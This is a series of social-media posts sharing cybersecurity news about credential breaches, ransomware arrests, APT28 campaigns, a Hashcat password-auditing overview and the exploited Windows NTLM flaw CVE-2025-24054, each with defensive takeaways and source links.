Rhaetian Railway has confirmed unauthorized access to customer data linked to its Vereina car shuttle ticketing system.

While card data was not impacted, exposed account credentials raise familiar questions around access control, credential storage, and customer-facing attack surfaces in transport infrastructure.

This incident reinforces the importance of continuous monitoring and credential hygiene in public-sector systems.

Follow @technadu for sober, technically grounded cybersecurity reporting.

Source: https://www.inside-it.ch/datenleck-bei-der-rhaetischen-bahn-20260122

Thoughts and analysis welcome.

#InfoSec #DataBreach #TransportSecurity #CredentialSecurity #PublicInfrastructure #CyberRisk

A recent investigation into malicious Chrome extensions targeting enterprise HR and ERP platforms highlights a persistent challenge: browser extensions operating with elevated trust.

The campaign involved credential cookie exfiltration, session hijacking, and interference with administrative security controls - demonstrating how extensions can bypass traditional perimeter defenses.

This reinforces the need for stronger browser governance, extension allow-listing, and visibility within enterprise environments.

Follow @technadu for neutral, practitioner-focused cybersecurity reporting.

Source: https://www.bleepingcomputer.com/news/security/credential-stealing-chrome-extensions-target-enterprise-hr-platforms/

Thoughtful discussion encouraged.

#InfoSec #EnterpriseSecurity #BrowserHardening #IdentityThreats #CredentialSecurity #SaaSRisk #CyberDefense #SecurityAwareness

Recent law enforcement actions against suspected Black Basta affiliates highlight how modern ransomware groups operate.
Investigators say some members focused on credential recovery and access enablement, while leadership coordinated targeting, negotiations, and cryptocurrency payments. Authorities seized digital media and continue forensic analysis.

Defensive implications:
• Credential theft remains a primary entry point
• Ransomware operations are modular and role-based
• Early-stage detection is critical
How are organizations adjusting controls to detect access misuse sooner?

Source:https://therecord.media/police-raid-homes-of-alleged-black-basta-hackers

Engage with the discussion and follow TechNadu for objective InfoSec coverage.

#InfoSec #Ransomware #ThreatIntelligence #CredentialSecurity #IncidentResponse #CyberDefense #TechNadu

APT28 is running credential-stealing campaigns to fuel long-term espionage — persistence, not noise, remains the real threat. Identity is still the weakest link. 🕵️‍♂️🔑 #APT #CredentialSecurity

https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html

🚨 Collins Aerospace Breached Twice in One Week — Everest + Ransomware

Evidence confirms two distinct incidents:
– Everest data exfiltration (Sept 10–11): leveraged old credentials from a 2022 RedLine infection.
– Ransomware attack (Sept 19): separate event, caused system disruptions.

Legacy credentials remain one of the most exploited weaknesses in enterprise networks.

💬 How does your team track and rotate long-term credentials? Comment below & follow TechNadu for real-time cyber intelligence.

#CyberSecurity #CollinsAerospace #Everest #Ransomware #RedLineStealer #InfoSec #CredentialSecurity #ThreatIntel #AviationSecurity #CyberDefense #ZeroTrust #TechNadu

🍔 Weak password practices strike again—“123456” led to a breach exposing data of 64M McDonald’s job applicants. Basic hygiene still matters.
#CredentialSecurity #DataBreach 🔓📄

https://www.bleepingcomputer.com/news/security/123456-password-exposed-info-for-64-million-mcdonalds-job-applicants/

🐈‍⬛ Hashcat – A Practical Guide to Password Auditing

Hashcat is a powerful GPU-accelerated password recovery tool used by security professionals to test the strength of passwords in authorized environments.

🧠 What Hashcat is used for:
• Auditing password hashes (e.g., from Windows, Linux, web apps)
• Testing password policies and complexity
• Identifying weak or reused credentials in simulated lab setups

🔐 Key Features:
• Supports a wide variety of hash types (MD5, SHA1, NTLM, bcrypt, etc.)
• Multiple attack modes: dictionary, brute-force, mask, hybrid, rule-based
• Highly customizable and efficient with GPU acceleration
• Works well for red teamers and defenders validating password hygiene

🎯 When to use it:
• During penetration tests (with permission)
• In password policy assessments
• For internal security audits and training exercises

Disclaimer: This guide is for educational and ethical use only. Only audit password hashes on systems you own or have explicit authorization to test.

#Hashcat #CyberSecurity #PasswordAuditing #EthicalHacking #InfoSec #EducationOnly #RedTeamTools #CredentialSecurity #GPUCracking #SecurityAssessment

⚠️ CVE-2025-24054 is now under active attack — and it only takes a single click to leak NTLM hashes from a Windows system.

CISA has added this medium-severity Windows vulnerability to its Known Exploited Vulnerabilities catalog after confirming exploitation in the wild. The flaw enables attackers to harvest NTLM credentials through specially crafted .library-ms files.

Here’s how it works:
- A user receives a malicious file — even a single click (no execution needed) can trigger NTLM hash leakage
- Attackers send these files via phishing emails, often packed in ZIP archives or delivered directly
- Opening the archive or previewing the file initiates an SMB request, leaking NTLMv2-SSP hashes
- These hashes can then be used for pass-the-hash or lateral movement attacks inside the network

Check Point reports that the vulnerability has been exploited in at least 10 campaigns so far, targeting government and private organizations in Poland, Romania, Ukraine, and Colombia.

What makes this threat more dangerous:
- NTLM is deprecated but still present in many environments
- Minimal user interaction is required — just download and extract
- It bypasses common detection tools by triggering quietly in Windows Explorer
- It's a variant of a previously exploited flaw (CVE-2024-43451)

Microsoft patched the flaw in March, but exploitation began almost immediately. Agencies under the FCEB have until May 8 to patch — but every organization should act sooner.

At @Efani we view this as another reminder that legacy protocols like NTLM are low-hanging fruit for attackers. Even medium-severity flaws can become major risks when they require near-zero user interaction.

Patch. Audit. Replace legacy auth where possible.

#CyberSecurity #NTLM #WindowsVulnerability #CVE202524054 #CredentialSecurity #EfaniSecure